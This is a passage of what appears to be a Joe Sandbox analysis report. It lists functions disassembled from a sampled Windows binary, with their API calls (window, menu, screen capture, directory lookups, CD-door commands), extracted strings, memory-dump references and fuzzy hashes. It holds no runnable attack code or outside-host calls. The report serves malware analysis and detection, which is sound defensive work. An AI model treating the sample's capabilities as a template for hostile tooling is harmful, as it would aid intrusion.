                                                                                              • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                              • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                              • String ID:
                                                                                              • API String ID: 3869813825-0
                                                                                              • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                              • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                              • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                              • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                              Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00464B28
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                              • _wcslen.LIBCMT ref: 00464C28
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                              • _wcslen.LIBCMT ref: 00464CBA
                                                                                              • _wcslen.LIBCMT ref: 00464CD0
                                                                                              • _wcslen.LIBCMT ref: 00464CEF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Directory$CurrentSystem
                                                                                              • String ID: D
                                                                                              • API String ID: 1914653954-2746444292
                                                                                              • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                              • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                              • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                              • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                              Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsicoll
                                                                                              • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                              • API String ID: 3832890014-4202584635
                                                                                              • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                              • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                              • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                              • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                              Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                              • GetFocus.USER32 ref: 0046A0DD
                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$CtrlFocus
                                                                                              • String ID: 0
                                                                                              • API String ID: 1534620443-4108050209
                                                                                              • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                              • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                              • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                              • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                              Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?), ref: 004558E3
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateDestroy
                                                                                              • String ID: ,$tooltips_class32
                                                                                              • API String ID: 1109047481-3856767331
                                                                                              • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                              • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                              • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                              • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                              Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                              • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                              • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                              • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                              • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                              • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                              • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                              • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                              • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                              • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                              • String ID: 0
                                                                                              • API String ID: 1441871840-4108050209
                                                                                              • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                              • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                              • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                              • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                              Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                              • __swprintf.LIBCMT ref: 00460915
                                                                                              • __swprintf.LIBCMT ref: 0046092D
                                                                                              • _wprintf.LIBCMT ref: 004609E1
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                              • API String ID: 3631882475-2268648507
                                                                                              • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                              • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                              • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                              • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                              Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                              • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                              • SendMessageW.USER32 ref: 00471740
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                              • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                              • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                              • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                              • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                              • SendMessageW.USER32 ref: 0047184F
                                                                                              • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                              • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                              • String ID:
                                                                                              • API String ID: 4116747274-0
                                                                                              • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                              • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                              • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                              • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                              Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                              • _wcslen.LIBCMT ref: 00461683
                                                                                              • __swprintf.LIBCMT ref: 00461721
                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                              • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                              • GetParent.USER32(?), ref: 004618C3
                                                                                              • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                              • String ID: %s%u
                                                                                              • API String ID: 1899580136-679674701
                                                                                              • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                              • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                              • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                              • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                              Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                              • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                              • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoItemMenu$Sleep
                                                                                              • String ID: 0
                                                                                              • API String ID: 1196289194-4108050209
                                                                                              • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                              • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                              • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                              • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                              Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 0043143E
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                              • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                              • String ID: (
                                                                                              • API String ID: 3300687185-3887548279
                                                                                              • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                              • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                              • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                              • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                              Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                              • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                              • API String ID: 1976180769-4113822522
                                                                                              • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                              • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                              • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
